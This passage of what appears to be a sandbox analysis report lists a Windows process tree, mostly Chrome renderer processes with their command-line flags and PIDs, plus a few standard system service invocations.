  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=6048,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6120 /prefetch:1
  2⤵
  PID:4836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=6040,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6032 /prefetch:1
  2⤵
  PID:2676
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=6068,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6172 /prefetch:1
  2⤵
  PID:1716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=6076,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6292 /prefetch:1
  2⤵
  PID:4020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=6408,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6512 /prefetch:1
  2⤵
  PID:3888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=6544,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6652 /prefetch:1
  2⤵
  PID:3944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=6520,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6776 /prefetch:1
  2⤵
  PID:2892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=6972,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6996 /prefetch:1
  2⤵
  PID:744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=7136,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7156 /prefetch:1
  2⤵
  PID:3772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=7164,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7300 /prefetch:1
  2⤵
  PID:384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=7332,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7448 /prefetch:1
  2⤵
  PID:4872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=7476,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7596 /prefetch:1
  2⤵
  PID:3012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=7736,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7604 /prefetch:1
  2⤵
  PID:956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=7772,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7884 /prefetch:1
  2⤵
  PID:3904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=7908,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8028 /prefetch:1
  2⤵
  PID:1112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=8172,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8048 /prefetch:1
  2⤵
  PID:776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=8180,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8312 /prefetch:1
  2⤵
  PID:1020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=8344,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8456 /prefetch:1
  2⤵
  PID:4936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=8464,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8612 /prefetch:1
  2⤵
  PID:2628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=8864,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8916 /prefetch:1
  2⤵
  PID:5372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=8448,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6808 /prefetch:1
  2⤵
  PID:5544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --field-trial-handle=9008,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9156 /prefetch:1
  2⤵
  PID:5552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=9232,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9252 /prefetch:1
  2⤵
  PID:5560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=9240,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9392 /prefetch:1
  2⤵
  PID:5568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --field-trial-handle=9412,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9536 /prefetch:1
  2⤵
  PID:5576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --field-trial-handle=9660,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9680 /prefetch:1
  2⤵
  PID:5584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=9708,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9828 /prefetch:1
  2⤵
  PID:5592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=9948,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9968 /prefetch:1
  2⤵
  PID:5600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=7588,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10116 /prefetch:1
  2⤵
  PID:5632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=10508,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10504 /prefetch:1
  2⤵
  PID:2180
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --field-trial-handle=10672,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10532 /prefetch:1
  2⤵
  PID:1968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --field-trial-handle=7192,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=11064 /prefetch:1
  2⤵
  PID:5624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --field-trial-handle=7344,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10292 /prefetch:1
  2⤵
  PID:6168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --field-trial-handle=11204,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=11200 /prefetch:1
  2⤵
  PID:6224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --field-trial-handle=11396,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=11420 /prefetch:1
  2⤵
  PID:6376
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --field-trial-handle=11508,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=11504 /prefetch:1
  2⤵
  PID:6456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --field-trial-handle=11484,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=11524 /prefetch:1
  2⤵
  PID:6464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --field-trial-handle=11444,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=11748 /prefetch:1
  2⤵
  PID:6472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --field-trial-handle=11756,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=11868 /prefetch:1
  2⤵
  PID:6480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --field-trial-handle=11876,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=12012 /prefetch:1
  2⤵
  PID:6488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --field-trial-handle=12160,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=12184 /prefetch:1
  2⤵
  PID:6504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --field-trial-handle=12204,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=12316 /prefetch:1
  2⤵
  PID:6516
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --field-trial-handle=12324,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=12448 /prefetch:1
  2⤵
  PID:6524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --field-trial-handle=12592,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=12596 /prefetch:1
  2⤵
  PID:6532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --field-trial-handle=12616,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=12724 /prefetch:1
  2⤵
  PID:6540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --field-trial-handle=12844,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=12860 /prefetch:1
  2⤵
  PID:6548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --field-trial-handle=12980,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=12992 /prefetch:1
  2⤵
  PID:6556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --field-trial-handle=13016,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=13120 /prefetch:1
  2⤵
  PID:6564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --field-trial-handle=13244,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=13144 /prefetch:1
  2⤵
  PID:6572
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --field-trial-handle=8288,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8228 /prefetch:1
  2⤵
  PID:6428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --field-trial-handle=13020,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=13592 /prefetch:1
  2⤵
  PID:3404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --field-trial-handle=13644,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=13600 /prefetch:1
  2⤵
  PID:5412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --field-trial-handle=13448,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=13376 /prefetch:1
  2⤵
  PID:7228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --field-trial-handle=13832,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8036 /prefetch:1
  2⤵
  PID:7280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --field-trial-handle=13856,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=13960 /prefetch:1
  2⤵
  PID:7288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --field-trial-handle=14176,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=14152 /prefetch:1
  2⤵
  PID:7396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --field-trial-handle=13968,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=14168 /prefetch:1
  2⤵
  PID:7404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --field-trial-handle=14764,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=14776 /prefetch:1
  2⤵
  PID:7512
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --field-trial-handle=14900,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=14560 /prefetch:1
  2⤵
  PID:7520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --field-trial-handle=15336,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=15328 /prefetch:1
  2⤵
  PID:1976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=10340,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=14960 /prefetch:8
  2⤵
  PID:7704
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --field-trial-handle=10948,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=14976 /prefetch:1
  2⤵
  PID:7904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=15344,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=15324 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --field-trial-handle=10420,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5720 /prefetch:1
  2⤵
  PID:7772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --field-trial-handle=15252,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=15212 /prefetch:1
  2⤵
  PID:7808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --field-trial-handle=14680,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=15188 /prefetch:1
  2⤵
  PID:2352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --field-trial-handle=10648,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5808 /prefetch:1
  2⤵
  PID:7660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --field-trial-handle=7980,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7928 /prefetch:1
  2⤵
  PID:6776

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2524

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2404

